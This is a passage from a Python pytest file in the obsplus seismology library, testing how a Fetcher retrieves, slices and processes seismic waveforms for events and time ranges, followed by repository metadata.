returned.\n \"\"\"\n for tr in stream:\n t1 = tr.stats.starttime\n t2 = tr.stats.endtime\n duration = t2.timestamp - t1.timestamp\n diff = duration - self.duration\n assert abs(diff) < 1.5 / tr.stats.sampling_rate\n\n # specific tests\n def test_stream_processor_ran(self, bing_stream_processed):\n \"\"\"\n Ensure the waveforms returned has been run through the\n custom processing function.\n \"\"\"\n for tr in bing_stream_processed:\n assert tr.stats[\"processor_ran\"]\n\n def test_get_waveforms_no_params(self, bingham_dataset):\n \"\"\"\n Get waveforms with no params should use start_date and\n end_date in inventory.\n \"\"\"\n fetcher = bingham_dataset.get_fetcher()\n st = fetcher.get_waveforms()\n assert isinstance(st, obspy.Stream)\n\n def test_nslc_filter(self, bingham_dataset):\n \"\"\"ensure the usual getwaveforms codes can be used to filter\"\"\"\n fetcher = bingham_dataset.get_fetcher()\n st = fetcher.get_waveforms(network=\"UU\", channel=\"*Z\")\n for tr in st:\n assert tr.stats.network == \"UU\"\n assert tr.stats.channel.endswith(\"Z\")\n\n def test_get_event_waveforms(self, subbing_fetcher_with_processor):\n \"\"\"Ensure the event waveforms can be returned.\"\"\"\n kwargs = dict(time_before=1, time_after=2)\n st_dict = subbing_fetcher_with_processor.get_event_waveforms(**kwargs)\n assert len(st_dict) == 1\n for eid, st in st_dict.items():\n assert isinstance(st, obspy.Stream)\n assert isinstance(eid, str)\n\n def test_timebefore_time_after(self, bingham_dataset):\n \"\"\"Ensure using time_before and time_after as ints works. 
see #168.\"\"\"\n fetcher = bingham_dataset.get_fetcher(time_before=1, time_after=10)\n for eid, st in fetcher.yield_event_waveforms():\n assert len(st)\n assert isinstance(st, obspy.Stream)\n\n\nclass TestYieldWaveforms:\n \"\"\"tests for yielding chunks of data between a time range\"\"\"\n\n duration = 10.0\n overlap = 2.0\n starttime = obspy.UTCDateTime(\"2009-04-01\")\n endtime = starttime + 60.0\n\n # helper functions\n def check_duration(self, st):\n \"\"\"ensure the durations are approximately correct\"\"\"\n for tr in st:\n duration = abs(tr.stats.endtime - tr.stats.starttime)\n tolerance = 1.5 / tr.stats.sampling_rate\n if (duration - (self.duration + self.overlap)) >= tolerance:\n return False\n return True\n\n def check_stream_processor_ran(self, st):\n \"\"\"Helper function to verify the function has run.\"\"\"\n for tr in st:\n try:\n if not tr.stats[\"processor_ran\"]:\n return False\n except (AttributeError, KeyError):\n return False\n return True\n\n # fixtures\n @pytest.fixture(scope=\"session\")\n def ta_stream(self, subbing_fetcher_with_processor):\n \"\"\"return a list of streams yielded from ta_test fetcher\"\"\"\n fet = subbing_fetcher_with_processor\n kwargs = dict(\n starttime=self.starttime,\n endtime=self.endtime,\n duration=self.duration,\n overlap=self.overlap,\n )\n return list(fet.yield_waveforms(**kwargs))\n\n # tests\n def test_durations(self, ta_stream):\n \"\"\"ensure the duration are as expected\"\"\"\n for st in ta_stream:\n assert self.check_duration(st)\n\n def test_stream_processor_ran(self, ta_stream):\n \"\"\"ensure the waveforms processor ran on each waveforms\"\"\"\n for st in ta_stream:\n for tr in st:\n assert tr.stats[\"processor_ran\"]\n\n\nclass TestYieldEventWaveforms:\n \"\"\"tests for getting waveforms that correspond to events\"\"\"\n\n time_before = 1\n time_after = 10\n duration = time_before + time_after\n overlap = 2.0\n commons = []\n\n # helper functions\n check_duration = TestYieldWaveforms.check_duration\n check_stream_processor_ran = TestYieldWaveforms.check_stream_processor_ran\n\n def check_stream_dict(self, st_dict):\n \"\"\"test waveforms dict\"\"\"\n assert isinstance(st_dict, dict) and st_dict\n for name, st in st_dict.items():\n assert isinstance(st, obspy.Stream) and len(st)\n\n # fixtures\n @pytest.fixture(scope=\"session\")\n @register_func(commons)\n def event_list_origin(self, subbing_fetcher_with_processor):\n \"\"\"\n Return a list of event waveforms, each starttime referenced\n at origin.\n \"\"\"\n func = subbing_fetcher_with_processor.yield_event_waveforms\n return dict(func(self.time_before, self.time_after))\n\n @pytest.fixture(scope=\"session\")\n @register_func(commons)\n def event_dict_p(self, subbing_fetcher_with_processor):\n \"\"\"\n Return a list of event waveforms, each starttime referenced\n at the pwave for the channel.\n \"\"\"\n # fetcher = bing_fetcher_with_processor\n func = subbing_fetcher_with_processor.yield_event_waveforms\n out = dict(func(self.time_before, self.time_after, reference=\"p\"))\n return out\n\n @pytest.fixture(scope=\"session\", params=commons)\n def stream_dict(self, request):\n \"\"\"collect all waveforms lists to apply general tests on\"\"\"\n return request.getfixturevalue(request.param)\n\n @pytest.fixture(scope=\"session\")\n def stream_dict_zero_starttime(self, bing_fetcher):\n \"\"\"yield waveforms into a dict using 0 for starttimes\"\"\"\n return dict(bing_fetcher.yield_event_waveforms(0, self.time_after))\n\n @pytest.fixture(scope=\"class\")\n def fetcher_no_inv(self, 
bingham_dataset):\n \"\"\"init wavefetcher with inv_df zeroed\"\"\"\n kwargs = dict(\n waveforms=bingham_dataset.waveform_client,\n events=bingham_dataset.event_client,\n )\n return Fetcher(**kwargs)\n\n @pytest.fixture(scope=\"class\")\n def fetcher_missing_events(self, bingham_dataset):\n \"\"\"Create a fetcher which has an event for which there is not data.\"\"\"\n ds: obsplus.Fetcher = bingham_dataset.copy()\n almost_last_event = ds.event_client[-2]\n last_event = ds.event_client[-1]\n # change origin time\n last_event.origins[-1].time += 10_000\n for pick in last_event.picks:\n pick.time += 10_000\n ds.event_client.events = [last_event, almost_last_event]\n return ds.get_fetcher()\n\n @pytest.fixture()\n def fetcher_one_event(self, bingham_dataset, tmp_path):\n \"\"\"Make a fetcher with only one event.\"\"\"\n fetcher = bingham_dataset.get_fetcher()\n inv = bingham_dataset.station_client.get_stations()\n # get stream and event\n kwargs = dict(time_before=1, time_after=1)\n for eid, st in fetcher.yield_event_waveforms(**kwargs):\n break\n eve = fetcher.event_client.get_events(eventid=eid)\n # create a new bank and return new fetcher\n wbank_path = tmp_path / \"waveforms\"\n wbank_path.mkdir(exist_ok=True, parents=True)\n wbank = obsplus.WaveBank(wbank_path)\n wbank.put_waveforms(st, update_index=True)\n wbank.read_index() # need to cache index\n return Fetcher(events=eve, stations=inv, waveforms=wbank)\n\n # general test\n\n def test_duration(self, stream_dict):\n \"\"\"ensure the duration of the streams is correct\"\"\"\n for _, st in stream_dict.items():\n assert self.check_duration(st)\n\n def test_stream_processor(self, stream_dict):\n \"\"\"ensure the waveforms processor ran\"\"\"\n assert len(stream_dict)\n for _, st in stream_dict.items():\n assert self.check_stream_processor_ran(st)\n\n # phase tests\n def test_only_p_phases(self, event_dict_p, subbing_fetcher_with_processor):\n \"\"\"make sure only stations that have p picks are returned\"\"\"\n stream = subbing_fetcher_with_processor.waveform_client.get_waveforms()\n df = subbing_fetcher_with_processor.picks_df\n for eve_id, st in event_dict_p.items():\n con1 = df[\"event_id\"] == eve_id\n con2 = df[\"phase_hint\"].str.upper() == \"P\"\n pick_df = df[con1 & con2]\n # iterate each pick, determine if it has data in the bank\n for ind, row in pick_df.iterrows():\n time = to_utc(row[\"time\"])\n kwargs = dict(\n starttime=time - self.time_before,\n endtime=time + self.time_after,\n station=row[\"station\"],\n )\n st1 = stream.get_waveforms(**kwargs)\n st2 = st.get_waveforms(**kwargs)\n assert_streams_almost_equal(st1, st2, allow_off_by_one=True)\n\n def test_s_phases(self, bingham_dataset):\n \"\"\"make sure only stations that have s picks are returned\"\"\"\n fetcher = bingham_dataset.get_fetcher()\n picks = obsplus.picks_to_df(fetcher.event_client.get_events())\n # There should be some s picks\n assert (picks[\"phase_hint\"].str.lower() == \"s\").any()\n func = fetcher.yield_event_waveforms\n out = dict(func(self.time_before, self.time_after, reference=\"S\"))\n for id, st in out.items():\n assert isinstance(st, obspy.Stream)\n\n # zero starttime test\n def test_zero_starttime(self, stream_dict_zero_starttime):\n \"\"\"test that zero starttimes doesnt throw an error\"\"\"\n for eve_id, stream in stream_dict_zero_starttime.items():\n if not len(stream):\n continue\n assert isinstance(stream, obspy.Stream)\n sr = stream[0].stats.sampling_rate\n t1, t2 = stream[0].stats.starttime, stream[0].stats.endtime\n duration = 
abs(t2.timestamp - t1.timestamp)\n assert abs(duration - self.time_after) < 2 * sr\n\n def test_stream_length(self, bingham_stream_dict):\n \"\"\"All of the events should have waveform data.\"\"\"\n has_data = [bool(x) for x in bingham_stream_dict.values()]\n assert all(has_data)\n\n def test_event_streams(self, bingham_dataset, bingham_stream_dict):\n \"\"\"Ensure the correct streams are given for ids.\"\"\"\n cat = bingham_dataset.event_client.get_events()\n evs = {str(ev.resource_id): ev for ev in cat}\n for eve_id, st in bingham_stream_dict.items():\n assert len(st), f\"no data for event:{eve_id}\"\n ev = evs[eve_id]\n time2 = get_reference_time(ev).timestamp\n tmin = min([tr.stats.starttime.timestamp for tr in st])\n assert abs(tmin - time2) < 12\n\n # fetch with no stations\n def test_yield_event_waveforms_no_inv(self, fetcher_no_inv):\n \"\"\"\n WaveFetchers backed by WaveBanks should be able to pull\n station data from wavebank index df in most cases.\n \"\"\"\n # ensure the inv_df is not None\n inv_df = fetcher_no_inv.station_df\n assert inv_df is not None\n assert not inv_df.empty\n kwargs = dict(time_after=10, time_before=20, reference=\"p\")\n st_dict = dict(fetcher_no_inv.yield_event_waveforms(**kwargs))\n self.check_stream_dict(st_dict)\n\n def test_events_no_data(self, subbing_fetcher_with_processor):\n \"\"\"\n Create a fetcher with events for which it doesn't have data.\n It should yield empty streams.\n \"\"\"\n fetcher = subbing_fetcher_with_processor\n events = obspy.read_events()\n wave_iterator = fetcher.yield_event_waveforms(1, 1, events=events)\n wave_list = list(wave_iterator)\n assert len(wave_list) == len(events)\n for _, st in wave_list:\n assert isinstance(st, obspy.Stream)\n assert len(st) == 0\n\n def test_raises_on_bad_reference_argument(self, bingham_dataset):\n \"\"\"Selecting a bad reference argument should raise.\"\"\"\n fetcher = bingham_dataset.get_fetcher()\n with pytest.raises(ValueError):\n list(fetcher.yield_event_waveforms(1, 2, reference=\"not supported\"))\n\n def test_raises_with_no_time_before_time_after(self, bing_fetcher):\n \"\"\"Not using time_before or time_after should raise ValueError\"\"\"\n with pytest.raises(ValueError):\n list(bing_fetcher.yield_event_waveforms())\n\n def test_doesnt_raise_on_missing_waveform(self, fetcher_missing_events):\n \"\"\"Ensure yield waveform doesnt raise on missing event.\"\"\"\n iterable = fetcher_missing_events.yield_event_waveforms(1, 10)\n ev_wfs = list(iterable)\n for event_id, stream in ev_wfs:\n assert isinstance(stream, obspy.Stream)\n\n def test_raise_on_missing_waveform(self, fetcher_missing_events, monkeypatch):\n \"\"\"Ensure yield waveform raises on missing event when specified.\"\"\"\n\n def _func(*args, **kwargs):\n raise ValueError(\"Something went wrong!\")\n\n fet = fetcher_missing_events\n monkeypatch.setattr(fet.waveform_client, \"get_waveforms_bulk\", _func)\n # this should raise\n with pytest.raises(ValueError):\n list(fet.yield_event_waveforms(1, 10, raise_on_fail=True))\n # this should not, it should just return an empty list\n with suppress_warnings(UserWarning):\n out = list(fet.yield_event_waveforms(1, 10, raise_on_fail=False))\n assert out == []\n\n def test_event_bank_with_one_event(self, fetcher_one_event):\n \"\"\"\n Ensure an event waveform can be retrieved from a bank with only\n one event. 
See #186.\n \"\"\"\n kwargs = dict(time_before=1, time_after=1)\n out = dict(fetcher_one_event.yield_event_waveforms(**kwargs))\n assert len(out) == 1\n st = list(out.values())[0]\n assert len(st)\n\n def test_gather(self, event_list_origin, event_dict_p):\n \"\"\"Simply gather aggregated fixtures so they are marked as used.\"\"\"\n\n\nclass TestStreamProcessor:\n \"\"\"ensure the waveforms processors get called\"\"\"\n\n # fixtures\n @pytest.fixture(scope=\"session\")\n def fetcher(self, bing_fetcher):\n \"\"\"return the waveform fetcher and overwrite the stream_processor\"\"\"\n new_fetcher = copy.deepcopy(bing_fetcher)\n\n def stream_processor(st: obspy.Stream) -> obspy.Stream:\n \"\"\"select the z component, detrend, and filter a waveforms\"\"\"\n st = st.select(component=\"Z\")\n st.detrend(\"linear\")\n st.filter(\"bandpass\", freqmin=1, freqmax=10)\n return st\n\n new_fetcher.stream_processor = stream_processor\n\n return new_fetcher\n\n @pytest.fixture(scope=\"session\")\n def stream_list(self, fetcher):\n \"\"\"Return a list of streams from yield waveforms.\"\"\"\n t1 = obspy.UTCDateTime(\"2009-04-01T00-00-00\")\n t2 = obspy.UTCDateTime(\"2009-04-01T03-59-59\")\n duration = 7200\n overlap = 60\n kwargs = dict(starttime=t1, endtime=t2, duration=duration, overlap=overlap)\n return list(fetcher.yield_waveforms(**kwargs))\n\n # tests\n def test_streams_only_z_components(self, stream_list):\n \"\"\"\n Ensure the st.select part of the waveforms processor discarded other\n channels.\n \"\"\"\n for st in stream_list:\n for tr in st:\n assert tr.id.endswith(\"Z\")\n\n\nclass TestSwapAttrs:\n \"\"\"ensure events, stations, and picks objects can be temporarily swapped out\"\"\"\n\n tb = 1\n ta = 3\n\n # fixtures\n\n @pytest.fixture(scope=\"class\")\n def new_time(self, bing_first_time):\n \"\"\"Get a new time based on the first event in bingham_test event + 1\"\"\"\n return to_utc(bing_first_time + 1)\n\n @pytest.fixture(scope=\"class\")\n def catalog(self, bingham_dataset, new_time):\n \"\"\"\n Assemble a events to test yield_event_waveforms with an event\n that was not initiated from the start.\n \"\"\"\n # get first event, create new origin to slightly add some time.\n ori = Origin(time=new_time, latitude=47.1, longitude=-100.22)\n event = Event(origins=[ori])\n return obspy.Catalog(events=[event])\n\n @pytest.fixture(scope=\"class\")\n def new_event_stream(self, bing_fetcher, catalog):\n \"\"\"\n Get a single event from the fetcher, overwriting the attached\n events.\n \"\"\"\n func = bing_fetcher.yield_event_waveforms\n result = func(time_before=self.tb, time_after=self.ta, events=catalog)\n return list(result)[0].stream\n\n @pytest.fixture(scope=\"class\")\n def yield_event_streams(self, bingham_dataset):\n \"\"\"yield a subset of the events in the bingham_test dataset\"\"\"\n event_df = bingham_dataset.event_client.get_events().to_df()\n fetcher = bingham_dataset.get_fetcher()\n tb = 1\n ta = 3\n ite = fetcher.yield_event_waveforms(tb, ta, events=event_df)\n return list(ite)\n\n @pytest.fixture(scope=\"class\")\n def new_inventory_df(self, bing_fetcher):\n \"\"\"return a new stations dataframe with only the first row\"\"\"\n return bing_fetcher.station_df.iloc[0:1]\n\n @pytest.fixture(scope=\"class\")\n def new_inventory_stream(self, bing_fetcher, new_inventory_df, new_time):\n \"\"\"swap out the stations to only return a subset of the channels\"\"\"\n t1, t2 = new_time - self.tb, new_time + self.ta\n return bing_fetcher.get_waveforms(\n starttime=t1, endtime=t2, 
stations=new_inventory_df\n )\n\n # tests for events swaps\n def test_time(self, new_event_stream, new_time):\n \"\"\"ensure the new time was returned\"\"\"\n assert len(new_event_stream)\n t1 = to_utc(new_event_stream[0].stats.starttime.timestamp)\n t2 = to_utc(new_event_stream[0].stats.endtime.timestamp)\n assert t1 < new_time < t2\n\n def test_iter(self, yield_event_streams):\n \"\"\"ensure the yield events worked\"\"\"\n for event_id, stream in yield_event_streams:\n assert isinstance(stream, obspy.Stream)\n\n # tests for stations swaps\n def test_streams(self, new_inventory_stream, new_inventory_df):\n \"\"\"ensure only the channel in the new_inventory df was returned\"\"\"\n assert len(new_inventory_stream) == 1\n assert new_inventory_stream[0].id == new_inventory_df[\"seed_id\"].iloc[0]\n\n\nclass TestCallWaveFetcher:\n \"\"\"\n Test that calling the wavefetcher provides a simplified interface for\n getting waveforms.\n \"\"\"\n\n tb = 1\n ta = 9\n duration = tb + ta\n\n # fixtures\n @pytest.fixture(scope=\"class\")\n def stream(self, bing_fetcher, bing_first_time):\n \"\"\"return a waveforms from calling the fetcher\"\"\"\n time = bing_first_time\n return bing_fetcher(time, time_before=self.tb, time_after=self.ta)\n\n # tests\n def test_callable(self, bing_fetcher):\n \"\"\"ensure the fetcher is callable\"\"\"\n assert callable(bing_fetcher)\n\n def test_is_stream(self, stream):\n \"\"\"ensure the waveforms is an instance of waveforms\"\"\"\n assert isinstance(stream, obspy.Stream)\n\n def test_channels(self, stream, bing_fetcher):\n \"\"\"ensure all channels are present\"\"\"\n stream_channels = {tr.id for tr in stream}\n sta_channels = set(bing_fetcher.station_df.seed_id)\n assert stream_channels == sta_channels\n\n def test_stream_duration(self, stream):\n \"\"\"ensure the waveforms is of proper duration\"\"\"\n stats = stream[0].stats\n duration = stats.endtime - stats.starttime\n sr = stats.sampling_rate\n assert abs(duration - self.duration) < 2 * sr\n\n def test_zero_in_time_before(self, bing_fetcher):\n \"\"\"ensure setting time_before parameter to 0 doesn't raise\"\"\"\n starttime = obspy.UTCDateTime(\"2009-04-01\")\n try:\n bing_fetcher(starttime, time_before=0, time_after=1)\n except AssertionError:\n pytest.fail(\"should not raise\")\n\n def test_zero_in_time_after(self, bing_fetcher):\n \"\"\"ensure setting time_after parameter to 0 doesn't raise\"\"\"\n starttime = obspy.UTCDateTime(\"2009-04-01\")\n try:\n bing_fetcher(starttime, time_before=1, time_after=0)\n except AssertionError:\n pytest.fail(\"should not raise\")\n\n\nclass TestClientNoGetBulkWaveForms:\n \"\"\"Test that clients without get bulk waveforms, ie earthworm, work\"\"\"\n\n duration = 600\n overlap = 10\n\n # fixtures\n @pytest.fixture\n def ta_bank_no_bulk(self, ta_dataset, monkeypatch):\n \"\"\"remove the get_waveforms_bulk from WaveBank class\"\"\"\n monkeypatch.delattr(WaveBank, \"get_waveforms_bulk\")\n # return a bank\n yield WaveBank(ta_dataset.waveform_path)\n\n @pytest.fixture\n def wavefetcher_no_bulk(self, ta_bank_no_bulk, ta_dataset):\n \"\"\"return a wavefetcher from the bank\"\"\"\n inv = ta_dataset.station_client.get_stations()\n return Fetcher(waveforms=ta_bank_no_bulk, stations=inv)\n\n @pytest.fixture\n def yielded_streams(self, wavefetcher_no_bulk, ta_time_range):\n \"\"\"Yield streams from fetcher.\"\"\"\n t1, t2 = ta_time_range\n duration, overlap = self.duration, self.overlap\n fun = wavefetcher_no_bulk.yield_waveforms\n kwargs = dict(starttime=t1, endtime=t2, duration=duration, 
overlap=overlap)\n ite = fun(**kwargs)\n return list(ite)\n\n # tests\n def test_streams_yielded(self, yielded_streams):\n \"\"\"\n Assert streams were yielded, ensuring get_waveforms rather\n than get_waveform_bulk was used.\n \"\"\"\n for st in yielded_streams:\n assert isinstance(st, obspy.Stream)\n\n\nclass TestFilterInventoryByAvailability:\n \"\"\"Ensure that only times in the stations get used in get_bulk_args call.\"\"\"\n\n t0 = obspy.UTCDateTime(\"2015-12-01\")\n t1 = obspy.UTCDateTime(\"2016-01-01\")\n t2 = obspy.UTCDateTime(\"2016-02-01\")\n\n # fixtures\n @pytest.fixture\n def altered_inv(self):\n \"\"\"return an stations with one enddate changed to a later date\"\"\"\n df = stations_to_df(obspy.read_inventory())\n df.loc[:, \"start_date\"] = self.t0\n df.loc[:, \"end_date\"] = self.t1\n df.loc[0, \"end_date\"] = self.t2\n return df\n\n @pytest.fixture\n def inv_with_none(self):\n \"\"\"return an stations with one enddate changed to None\"\"\"\n df = stations_to_df(obspy.read_inventory())\n df.loc[:, \"start_date\"] = self.t0\n df.loc[:, \"end_date\"] = self.t1\n df.loc[0, \"end_date\"] = None\n return df\n\n @pytest.fixture\n def bulk_arg_later_time(self, altered_inv):\n \"\"\"Return bulk args for latter time test.\"\"\"\n fetcher = Fetcher(None, stations=altered_inv)\n return fetcher._get_bulk_args(starttime=self.t1 + 10, endtime=self.t2)\n\n @pytest.fixture\n def bulk_arg_none_end_date(self, inv_with_none):\n \"\"\"return the bulk args from an inv with None endate\"\"\"\n fetcher = Fetcher(None, stations=inv_with_none)\n return fetcher._get_bulk_args(starttime=self.t0, endtime=self.t1)\n\n @pytest.fixture\n def fetcher(self, altered_inv, bing_fetcher):\n \"\"\"return a fetcher with the modified times\"\"\"\n return Fetcher(bing_fetcher.waveform_client, stations=altered_inv)\n\n # tests\n def test_bulk_arg_is_limited(self, bulk_arg_later_time, altered_inv):\n \"\"\"\n Ensure bulk arg doesn't include times the stations doesnt\n have data.\n \"\"\"\n assert len(bulk_arg_later_time) == 1\n ba = bulk_arg_later_time[0]\n ser = altered_inv.iloc[0]\n assert ba[0] == ser.network\n assert ba[1] == ser.station\n assert ba[3] == ser.channel\n\n def test_none_endtimes_are_used(self, bulk_arg_none_end_date, inv_with_none):\n \"\"\"ensure any channels with enddates of None are not filtered out\"\"\"\n assert len(bulk_arg_none_end_date) == len(inv_with_none)\n\n def test_empty_stream_from_before_start(self, fetcher):\n \"\"\"\n Ensure when data is requested before stations starttime that an\n empty string is returned.\n \"\"\"\n st = fetcher(obspy.UTCDateTime(\"1970-01-01\"), 10, 40)\n assert isinstance(st, obspy.Stream)\n assert not len(st)\n\n\nclass TestFetchersFromDatasets:\n \"\"\"Tests for the fetchers returned from the datasets.\"\"\"\n\n @pytest.fixture(scope=\"class\", params=DataSet._datasets)\n def data_fetcher(self, request):\n \"\"\"Return a datafetcher from all datasets.\"\"\"\n with suppress_warnings(UserWarning):\n return obsplus.load_dataset(request.param).get_fetcher()\n\n def test_type(self, data_fetcher):\n \"\"\"Ensure a fetcher was returned.\"\"\"\n assert isinstance(data_fetcher, Fetcher)\n\n def test_event_df(self, data_fetcher):\n \"\"\"ensure the event df has the event_id column.\"\"\"\n df = data_fetcher.event_df\n assert \"event_id\" in df.columns\n\n\nclass TestFetcherDuplicateChannels:\n \"\"\"\n Ensure the fetcher does the right thing when duplicate channels occur\n in the inventory.\n \"\"\"\n\n def split_inventory(self, inv_df, cat):\n \"\"\"\n Split the 
inventory and duplicate so first have encompasses half of\n the events and second gets the second half.\n \"\"\"\n edf = obsplus.events_to_df(cat).sort_values(\"time\")\n ser = edf.loc[len(edf) // 2]\n inv1, inv2 = inv_df.copy(), inv_df.copy()\n inv1[\"end_date\"] = ser[\"time\"]\n inv2[\"start_date\"] = ser[\"time\"]\n new = pd.concat([inv1, inv2], ignore_index=True, axis=0).reset_index()\n return df_to_inventory(new)\n\n @pytest.fixture\n def fetcher_duplicate_channels(self, bingham_dataset):\n \"\"\"Create a fetcher with duplicate channels\"\"\"\n inv_df = obsplus.stations_to_df(bingham_dataset.station_client)\n cat = bingham_dataset.event_client\n wbank = bingham_dataset.waveform_client\n inv = self.split_inventory(inv_df, cat)\n return Fetcher(waveforms=wbank, events=cat, stations=inv)\n\n def test_get_waveforms(self, fetcher_duplicate_channels):\n \"\"\"Ensure the Fetcher can yield event waveforms.\"\"\"\n fet = fetcher_duplicate_channels\n # before the fix this would raise; just check the output\n st_dict = dict(fet.yield_event_waveforms(time_after=5, time_before=1))\n for event_id, st in st_dict.items():\n assert isinstance(st, obspy.Stream)\n assert len(st)\n","repo_name":"niosh-mining/obsplus","sub_path":"tests/test_structures/test_fetcher.py","file_name":"test_fetcher.py","file_ext":"py","file_size_in_byte":34459,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"44"}